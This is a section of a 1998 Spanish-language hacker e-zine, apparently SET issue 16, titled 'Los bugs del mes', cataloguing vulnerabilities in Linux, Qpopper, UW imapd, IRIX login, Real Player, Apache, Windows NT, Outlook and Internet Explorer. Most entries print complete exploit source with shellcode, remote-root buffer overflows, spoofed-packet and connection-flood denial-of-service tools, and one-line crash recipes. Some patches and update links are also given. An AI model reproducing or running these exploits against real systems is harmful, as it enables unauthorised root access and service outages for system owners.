-[ 0x09 ]-------------------------------------------------------------------- -[ LOS BUGS DEL MES ]-------------------------------------------------------- -[ by SET Staff ]-----------------------------------------------------SET-16- -( 0x01 )- Para : Linux kernel Tema : SUID root sin SUID root Patch : Aqui mismito Creditos : Michal Zalewski <++> set_016/patches/linuxk --- linux/kernel/sys.c.orig Tue Apr 8 17:47:47 1997 +++ linux/kernel/sys.c Fri Jun 19 16:00:28 1998 @@ -237,6 +237,8 @@ { int old_rgid = current->gid; int old_egid = current->egid; + + if (rgid>0xffff || egid>0xffff) return -EINVAL; if (rgid != (gid_t) -1) { if ((old_rgid == rgid) || @@ -272,6 +274,8 @@ asmlinkage int sys_setgid(gid_t gid) { int old_egid = current->egid; + + if (gid>0xffff) return -EINVAL; if (suser()) current->gid = current->egid = current->sgid = current->fsgid = gid; @@ -489,6 +493,8 @@ asmlinkage int sys_setuid(uid_t uid) { int old_euid = current->euid; + + if (uid>0xffff) return -EINVAL; if (suser()) current->uid = current->euid = current->suid = current->fsuid = uid; @@ -510,6 +516,8 @@ asmlinkage int sys_setfsuid(uid_t uid) { int old_fsuid = current->fsuid; + + if (uid>0xffff) return -EINVAL; if (uid == current->uid || uid == current->euid || uid == current->suid || uid == current->fsuid || suser()) @@ -525,6 +533,8 @@ asmlinkage int sys_setfsgid(gid_t gid) { int old_fsgid = current->fsgid; + + if (gid>0xffff) return -EINVAL; if (gid == current->gid || gid == current->egid || gid == current->sgid || gid == current->fsgid || suser()) @@ -563,6 +573,8 @@ asmlinkage int sys_setpgid(pid_t pid, pid_t pgid) { struct task_struct * p; + + if (pid>0xffff || pgid>0xffff) return -EINVAL; if (!pid) pid = current->pid; <--> Descripcion y Notas: Un error en la definicion de algunas variables que intervienen en la gestion del UID permite poseer una ID distinta de 0 y que para el sistema sea eficazmente ID 0 (root). El kernel almacena la ID en un word (2 bytes), lo que limita el ID al rango entre 0 y 65535. Sin embargo, el tipo definido para el manejo de UID y GID (uid_t) se declara como un entero sin signo, lo que le da la posibilidad de manejar IDs por encima de 65535. Por su parte, algunas llamadas al sistema, como sys_setuid(uid_t), truncan el valor de la ID a 2 bytes. De esta forma, si alteramos el fichero /etc/passwd de forma que nuestra ID sea 131072 (10 00000000 00000000), nuestra ID eficaz sera 0, es decir, los dos bytes menos significativos. Y como las utilidades para la deteccion de intrusos en el fichero /etc/passwd buscan por ID 0, pasamos desapercibidos. Tambien funciona en el caso de accesos restringidos desde el exterior. Es habitual no permitir el acceso remoto con privilegios de root. Con nuestra ID 131072, no tenemos privilegios, por lo que podemos acceder remotamente sin problemas, pero para el kernel nuestra ID es la del root. -( 0x02 )- Para : Qpopper 2.4x Tema : De todo un poco Patch : Actualizacion Creditos : Herbert Rosmanith <++> set_016/exploits/qpush.c /* qpush: qualcom popper buffer overflow exploit (pop_msg) * Mon Jun 29 01:26:06 GMT 1998 - herp * Herbert Rosmanith * herp@wildsau.idv.uni-linz.ac.at */ #include #include #include #include #include #include #include #include long addrlist[]={ 0xbfffeee4, /*2.2*/ 0xbfffeb80 /*2.41beta1*/ }; char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh........."; void die(char *s) { if (errno) perror(s); else fprintf(stderr,"%s\n",s); exit(-1); } void usage() { printf("qpush [-index] \n" " -0 QPOP Version 2.2 (default)\n" " -1 QPOP Version 2.41beta1\n"); exit(0); } int resolv(char *host,long *ipaddr) { if (isdigit(host[0])) { *ipaddr=inet_addr(host); if (*ipaddr==-1) return -1; } else { struct hostent *hp; if ((hp=gethostbyname(host))==NULL) { fprintf(stderr,"tc: %s: unknown host\n"); exit(-1); } *ipaddr=*(unsigned long *)hp->h_addr; } return 0; } int connect_to(char *hostname,short port) { struct sockaddr_in s_in; int s; s=socket(PF_INET,SOCK_STREAM,0); if (s==-1) die("socket"); if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1) die("unknown host"); s_in.sin_family=AF_INET; s_in.sin_port=htons(port); if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1) die("connect"); return s; } void socket_read(int s,char *buf,int len) { int i; switch(i=read(s,buf,len)) { case -1: die("unexpected EOF"); case 0: die("EOF"); default: buf[i]=0; //printf("%s",buf); break; } } void terminal(int s) { char buf[1024]; fd_set rfds; fd_set fds; int i; for (i=0;i=2 && argv[1][0]=='-') { ix=atoi(&argv[1][1]); argc--; argv++; } else ix=0; if (argc!=2 || ix>sizeof(addrlist)/sizeof(long)) usage(); s=connect_to(argv[1],110); /* WKS POP3 */ socket_read(s,buf,sizeof(buf)); memset(buf,0x90,sizeof(buf)); for (i=981;i<981+10*4;i+=4) memcpy(&buf[i],&addrlist[ix],4); memcpy(&buf[941],shellcode,strlen(shellcode)); buf[sizeof(buf)-3]=0x0d; buf[sizeof(buf)-2]=0x0a; buf[sizeof(buf)-1]=0x00; write(s,buf,sizeof(buf)); socket_read(s,buf,sizeof(buf)); terminal(s); } <--> Descripcion y Notas: Menuda se ha montado este verano con el qpopper. Nadie se aclara. Por un lado buffers overflow, por otro core dumps, y no pueden faltar cualquier otro tipo de anomalias. Pese a que el fallo original parece afectar a las implementacions en diferentes sistemas operativos, el exploit que os dejamos solo funciona para la version de Linux, excepto para la Debian con el QPop v2.2 Al final los de Qualcomm han sacado por fin una version nueva, aparentemente sin el fallo que ha generado tanto revuelo. Para conseguirla: ftp://ftp.qualcomm.com/oldeudora/servers/unix/popper/qpopper2.5.tar.Z -( 0x03 )- Para : Linux 2.0.34 inetd Tema : Matar el inetd Patch : Kernel 2.0.35 Creditos : David Luyer <++> set_016/exploits/inetdkill.c #include #include #include #include #include int main(int argc, char *argv[]) { int s, p; if(argc != 2) { fputs("Please specify a pid to send signal to.\n", stderr); exit(0); } else { p = atoi(argv[1]); } fcntl(0,F_SETOWN,p); s = fcntl(0,F_GETFL,0); fcntl(0,F_SETFL,s|O_ASYNC); printf("Sending SIGIO - press enter.\n"); getchar(); fcntl(0,F_SETFL,s&~O_ASYNC); printf("SIGIO send attempted.\n"); return 0; } <--> Descripcion y Notas: La ejecucion de este codigo en un Linux con el kernel 2.0.34, se tengan o no privilegios, mata el demonio inetd. En aquellos sistemas que no usen glibc, debe a¤adirse la linea: #define O_ASYNC FASYNC -( 0x04 )- Para : Red Hat 4.2, 5.0 y 5.1 Tema : Programas con agujeros Patch : Actualizarse Creditos : twiztah Descripcion y Notas: Algunos de los binarios que se instalan con las distribuciones de Red Hat que hemos mencionado presentan problemas de seguridad importantes, por lo que se recomienda actualizarse a las nuevas versiones. Los programas afectados son: bind, libtermcap, tin, slang, metamail, mailx, dosemu y libtermcap. Las actualizaciones (para la 5.1) las teneis disponibles en: ftp://ftp.redhat.com/updates/5.1/i386/metamail-2.7-17.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/mailx-8.1.1-3.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/bind-4.9.7-1.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/slang-0.99.38-7.i386.rpm ftp://ftp.redhat.com/updates/5.1/i386/tin-1.22-11.i386.rpm ftp://ftp.redhat.com/updates/5.0/i386/dosemu-0.66.7-7.i386.rpm ftp://ftp.redhat.com/updates/5.0/i386/libtermcap-2.0.8-9.i386.rpm Los usuarios de las distribuciones 5.0 y 4.2 las encontrareis en: ftp://ftp.redhat.com/updates/5.0/i386/ ftp://ftp.redhat.com/updates/4.2/i386/ Los nombres de los ficheros son los mismos, variando la version de la actualizacion. Existen tambien actualizaciones para alpha y sparc en los directorios correspondientes. -( 0x05 )- Para : Proxy en Windows 95 Tema : Cuelgue del proxy Patch : Supongo que en las paginas oficiales Creditos : Ryan Nichols Descripcion y Notas: Solo dos son los programas proxy afectados en esta ocasion: WinGate y Startech. En ambos casos el procedimiento es similar. Comenzamos haciendo un telnet al puerto pop3 del proxy. En el caso de ser WinGate, teclearemos: USER x#99999..... Con todos los '9' que podamos. De tratarse de Startech, tecleamos: USER x<9999...> De nuevo con todos los '9' posibles. El resultado es el mismo. -( 0x06 )- Para : Real Player 5 Tema : Cuelgue del real Player Patch : En la ultima version Creditos : Kit Knox <++> set_016/exploits/rpkiller.c /* * Real Player Killer - 6/26/98 * * (C) 1998 Kit Knox * * [ http://www.rootshell.com/ ] * * Real Player 5.0 for Windows95 and Linux (others untested) do not check * the validity of incoming UDP packets used when receiving audio/video. * * If you are able to determine or brute force the destination port of the * stream you are able to crash the player and cause it to use 100% of * idle CPU. I would not be surprised if there are numerous buffer * overflows in this area as well. The client does not even check if the * source IP address is the one it is receiving data from. Any source IP * can be used. * * Generally the stack will start with port 1025 and go up. Starting there * and going up will generally give you good results. If you are able to * sniff the network you will know the exact port and not have to guess. * */ #include #include #include #include #include #include #include #include #include #include #include #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } char real_data[] = { 0x00, 0x00 }; unsigned short in_cksum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; char crashme[500]; int i; ip.ihl = 5; ip.version = 4; ip.tos = rand () % 100;; ip.tot_len = htons (28 + datalen); ip.id = htons (31337 + (rand () % 100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum ((char *) &ip, sizeof (ip)); udp.source = htons (sport); udp.dest = htons (dport); udp.len = htons (8 + datalen); udp.check = (short) 0; memcpy (packet, (char *) &ip, sizeof (ip)); memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); for (i = 0; i < 500; i++) crashme[i] = rand () % 255; memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, (struct sockaddr *) sin, sizeof (struct sockaddr_in))); } unsigned int lookup (host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr (host); if (addr == -1) { he = gethostbyname (host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); } return (addr); } void main (argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s, i; if (argc != 5) errs ("Usage: %s \n", argv[0]); printf("Real Player Killer - http://www.rootshell.com/\n\n"); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err ("Unable to open raw socket.\n"); if (!(saddr = lookup (argv[1]))) err ("Unable to lookup source address.\n"); if (!(daddr = lookup (argv[2]))) err ("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_port = 9; sin.sin_addr.s_addr = daddr; for (i=atoi(argv[3]); i -( 0x07 )- Para : SlackWare 3.4 /bin/login Tema : Acceso modo root Patch : /etc/groups Creditos : Richard Thomas Descripcion y Notas: Cada vez nos lo ponen mas simple. En esta ocasion, si accedemos a un SlackWare que no tiene el fichero /etc/groups directamente conseguimos UID 0 GID 0... root access granted ;) -( 0x08 )- Para : IRIX 6.3 y 6.4 Tema : Sobrecarga del procesador Patch : Uhmmm! Creditos : Matthew Potter Descripcion y Notas: Tan simple como ejecutar: finger -l @@@@@@@@@@@@@@@@@@@@@destino@bounce_host donde debe haber unas 500 @ Entonces la maquina destino sufre una sobrecarga de procesos importante. -( 0x09 )- Para : UW impad (Pine 4.0) Tema : Root access entre otras cosas Patch : Aqui y en la UW Creditos : Cheez Whiz <++> set_016/exploits/imappy.c /** *** i386 BSD remote root exploit for UW imapd IMAP 4.1 server *** *** This is *not* the same bug addressed in CERT Advisory CA-97.09! *** *** Usage: % (imappy nop esp offset; cat) | nc hostname 143 *** *** where nop is the number of NOP opcodes to place at the start of the *** exploit buffer (I use 403), esp is the %esp stack pointer value, and *** offset is the number of bytes to add to esp to calculate your target *** %eip. *** *** Demonstration values for UW imapd 10.234 (part of Pine 4.00): *** *** imappy 403 0xefbfd5e8 100 (BSDI 3.0) *** imappy 403 0xefbfd4b8 100 (FreeBSD 2.2.5) *** *** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER *** *** Cheez Whiz *** cheezbeast@hotmail.com *** *** July 16, 1998 **/ #include #include #include #include #define BUFLEN (2*1024) #define NOP 0x90 char shell[] = /* 0 */ "\xeb\x34" /* jmp springboard */ /* start: */ /* 2 */ "\x5e" /* popl %esi */ /* 3 */ "\x8d\x1e" /* leal (%esi),%ebx */ /* 5 */ "\x89\x5e\x0b" /* movl %ebx,0xb(%esi) */ /* 8 */ "\x31\xd2" /* xorl %edx,%edx */ /* 10 */ "\x89\x56\x07" /* movl %edx,0x7(%esi) */ /* 13 */ "\x89\x56\x0f" /* movl %edx,0xf(%esi) */ /* 16 */ "\x89\x56\x14" /* movl %edx,0x14(%esi) */ /* 19 */ "\x88\x56\x19" /* movb %dl,0x19(%esi) */ /* 22 */ "\x31\xc0" /* xorl %eax,%eax */ /* 24 */ "\xb0\x7f" /* movb $0x7f,%al */ /* 26 */ "\x20\x46\x01" /* andb %al,0x1(%esi) */ /* 29 */ "\x20\x46\x02" /* andb %al,0x2(%esi) */ /* 32 */ "\x20\x46\x03" /* andb %al,0x3(%esi) */ /* 35 */ "\x20\x46\x05" /* andb %al,0x5(%esi) */ /* 38 */ "\x20\x46\x06" /* andb %al,0x6(%esi) */ /* 41 */ "\xb0\x3b" /* movb $0x3b,%al */ /* 43 */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */ /* 46 */ "\x89\xca" /* movl %ecx,%edx */ /* 48 */ "\x52" /* pushl %edx */ /* 49 */ "\x51" /* pushl %ecx */ /* 50 */ "\x53" /* pushl %ebx */ /* 51 */ "\x50" /* pushl %eax */ /* 52 */ "\xeb\x18" /* jmp exec */ /* springboard: */ /* 54 */ "\xe8\xc7\xff\xff\xff" /* call start */ /* data: */ /* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8" /* DATA (disguised /bin/sh) */ /* 66 */ "\x01\x01\x01\x01" /* DATA */ /* 70 */ "\x02\x02\x02\x02" /* DATA */ /* 74 */ "\x03\x03\x03\x03" /* DATA */ /* exec: */ /* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0 */ char buf[BUFLEN]; unsigned long int nop, esp; long int offset; void main (int argc, char *argv[]) { int i; if (argc < 4) { printf("usage: %s nop esp offset\n", argv[0]); return; } nop = strtoul(argv[1], NULL, 0); esp = strtoul(argv[2], NULL, 0); offset = strtol(argv[3], NULL, 0); memset(buf, NOP, BUFLEN); memcpy(buf+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4) *((int *) &buf[i]) = esp + offset; printf("* AUTHENTICATE {%d}\r\n", BUFLEN); for (i = 0; i < BUFLEN; i++) putchar(buf[i]); printf("\r\n"); return; } <--> Descripcion y Notas: Un error en la implementacion del imapd que se distribuye conjuntamente al Pine 4.0, permite, entre otras cosas, conseguir accesos no autorizados de forma remota. El parche lo distribuye la Universidad de Washington, con la numeracion 10234, como el original. De todas formas, basta con cambiar el codigo de la funcion mail_auth() de mail.c que se distribuye por el siguiente para evitar el problema <++> set_016/patches/imapd.c char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[]) { char tmp[MAILTMPLEN]; AUTHENTICATOR *auth; /* cretins still haven't given up */ if (strlen (mechanism) >= MAILTMPLEN) syslog (LOG_ALERT|LOG_AUTH,"System break-in attempt, host=%.80s", tcp_clienthost ()); else { /* make upper case copy of mechanism name */ ucase (strcpy (tmp,mechanism)); for (auth = mailauthenticators; auth; auth = auth->next) if (auth->server && !strcmp (auth->name,tmp)) return (*auth->server) (resp,argc,argv); } return NIL; /* no authenticator found */ } <--> Si lo preferis, podeis obtener la version ya parcheada en: ftp://ftp.cac.washington.edu/mail/imap.tar.Z -( 0x0A )- Para : who Tema : Lo que se os ocurra Patch : A ver, a ver... Creditos : Paul Boehm Descripcion y Notas: En algunos sistemas, who se encuentra en el grupo de los programas privilegiados, que, por ejemplo, pueden leer el utmp. Ejecutando who con algunos truquitos, podemos hacer casi de todo. Por ejemplo, en RedHat 5.1 ejecutar who /bin/bash el sistema se cuelga. En FreeBSD puede usarse para ver ficheros pertenecientes al mismo grupo que who, de la forma who /fichero -( 0x0B )- Para : PovRay 3.02 Tema : Acceso root Patch : Ya veremos Creditos : Luke Descripcion y Notas: Al instalar el PovRay 3.02 para linux, la libreria s-povray tiene que tener suid root para poder ejecutarse sin problemas (acceso a /dev/console). El problema surge cuando desde la shell damos un nombre de fichero largo, resultando en un segmentation fault. Ejemplo: [root@hazard root]# s-povray -I`perl -e "print 'A'x1000"` -( 0x0C )- Para : Internet Explorer 4.0 Tema : System Crash entre otros Patch : Mozilla rulez !!! Creditos : Varios Descripcion y notas: Por una parte, tenemos que si incluimos la etiqueta en una pagina HTML y la cargamos con el Explorer, podemos hacer desde que el explorer se cierre hasta llegar al pantallazo azul. Pero para ello, la etiqueta debe llevar algo especial. Veamos: Segun como le de al sistema, pasara una cosa u otra. Tambien tenemos el siguiente codigo: <++> set_016/exploits/ie4.html Adios IE 4.0 <--> -( 0x0D )- Para : Microsoft Outlook Tema : Overflow Patch : Microsoft?!?!?! LINUX !!!! Creditos : Ryan Veety Descripcion y Notas: Un mensaje que contenga: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806" This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --204-1969819122-901726347=:19806 Content-Type: TEXT/PLAIN; charset=US-ASCII test --204-1969819122-901726347=:19806 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Don't read this text file --204-1969819122-901726347=:19806-- Cuelga el Outlook, dando un error en la direccion 0x41414141 (AAAA) -( 0x0E )- Para : Apache Tema : Crash Patch : http://www.apache.org Creditos : Dag-Erling Coidan Smirgrav <++> /set_016/exploits/sioux.c /*- * Copyright (c) 1998 Dag-Erling Coidan Smirgrav * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer * in this position and unchanged. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software withough specific prior written permission * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * */ /* * Kudos to Mark Huizer who originally suggested this on freebsd-current */ #include #include #include #include #include #include #include #include void usage(void) { fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n"); exit(1); } int main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *f; int o, sd; /* default parameters */ char *addr = "localhost"; int port = 80; int num = 1000; /* get options */ while ((o = getopt(argc, argv, "a:p:n:")) != EOF) switch (o) { case 'a': addr = optarg; break; case 'p': port = atoi(optarg); break; case 'n': num = atoi(optarg); break; default: usage(); } if (argc != optind) usage(); /* connect */ if ((he = gethostbyname(addr)) == NULL) { perror("gethostbyname"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family = he->h_addrtype; sin.sin_port = htons(port); if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); exit(1); } if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connect"); exit(1); } if ((f = fdopen(sd, "r+")) == NULL) { perror("fdopen"); exit(1); } /* attack! */ fprintf(stderr, "Going down like a plague of locusts on %s\n", addr); fprintf(f, "GET / HTTP/1.1\r\n"); while (num-- && !ferror(f)) fprintf(f, "User-Agent: sioux\r\n"); if (ferror(f)) { perror("fprintf"); exit(1); } fclose(f); exit(0); } <--> -( 0x0F )- Para : Irix 6.3 Tema : root access Patch : Donde siempre... SGI lo tiene, y nosotros tambien Creditos : David Hedley <++> set_016/exploits/login.c /* /bin/login exploit by DCRH 24/5/97 * * Tested on: R3000 Indigo (Irix 5.3) * R4400 Indy (Irix 5.3) * R5000 O2 (Irix 6.3) * R8000 Power Challenge (Irix 6.2) * * Compile as: cc -n32 login.c (for Irix 6.x) * cc login.c (for Irix 5.x) * * Press enter when prompted for a password * */ #include #include #include #include #include #define BUF_LENGTH 200 #define EXTRA 300 #define OFFSET 0x1b0 #define IRIX_NOP 0x03e0f825 /* move $ra,$ra */ #define u_long unsigned u_long get_sp_code[] = { 0x03a01025, /* move $v0,$sp */ 0x03e00008, /* jr $ra */ 0x00000000, /* nop */ }; u_long irix_shellcode[] = { 0x24041234, /* li $4,0x1234 */ 0x2084edcc, /* sub $4,0x1234 */ 0x0491fffe, /* bgezal $4,pc-4 */ 0x03bd302a, /* sgt $6,$sp,$sp */ 0x23e4012c, /* addi $4,$31,264+36 */ 0xa086feff, /* sb $6,-264+7($4) */ 0x2084fef8, /* sub $4,264 */ 0x20850110, /* addi $5,$4,264+8 */ 0xaca4fef8, /* sw $4,-264($5) */ 0xaca6fefc, /* sw $4,-260($5) */ 0x20a5fef8, /* sub $5, 264 */ 0x240203f3, /* li $v0,1011 */ 0x03ffffcc, /* syscall 0xfffff */ 0x2f62696e, /* "/bin" */ 0x2f7368ff, /* "/sh" */ }; char buf[BUF_LENGTH + EXTRA + 8]; void main(int argc, char **argv) { char *env[] = {NULL}; u_long targ_addr, stack; u_long *long_p; int i, code_length = strlen((char *)irix_shellcode)+1; u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code; stack = get_sp(); long_p =(u_long *) buf; targ_addr = stack + OFFSET; if (argc > 1) targ_addr += atoi(argv[1]); while ((targ_addr & 0xff000000) == 0 || (targ_addr & 0x00ff0000) == 0 || (targ_addr & 0x0000ff00) == 0 || (targ_addr & 0x000000ff) == 0) targ_addr += 4; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = IRIX_NOP; for (i = 0; i < code_length/sizeof(u_long); i++) *long_p++ = irix_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = (targ_addr << 24) | (targ_addr >> 8); *long_p = 0; printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr); execle("/bin/login", "login", "-h", &buf[1], 0, env); perror("execl failed"); } <--> Descripcion y Notas: Cuando se ejecuta el exploit, nos pide una clave. Le damos a enter sin teclear nada y estamos dentro con privilegios de root. El patch es tan sencillo como ejecutar: chmod u-s /bin/login -( 0x10 )- Para : Windows NT 4.0 Tema : Crash Patch : Maybe SP3, Maybe LINUX Creditos : Bob Beck <++> set_016/exploits/nt.pl #!/usr/local/bin/perl use Socket; use FileHandle; require "chat2.pl"; $ILoveBill = $ARGV[0] && shift; $verbose = 0; # tell me what you're hitting $knownports = 0; # don't hit known problem ports for ($port = $0; $port<65535; $port++) { if ($knownports && ($port == 135 || $port== 1031)) { next; } $fh = chat::open_port($ILoveBill, $port); chat::print ($fh,"Windows NT is the platform of the future"); if ($verbose) { print "Trying port: $port\n\n"; } chat::close($fh); } <--> Descripcion y Notas: Pues el mismo problema de siempre, el clasico con el puerto 135, el origen de los nukes... pero en el puerto 1031, esto es, inetinfo. Creo que ya lo hemos dicho en mas de una ocasion... Pero sigue fallando.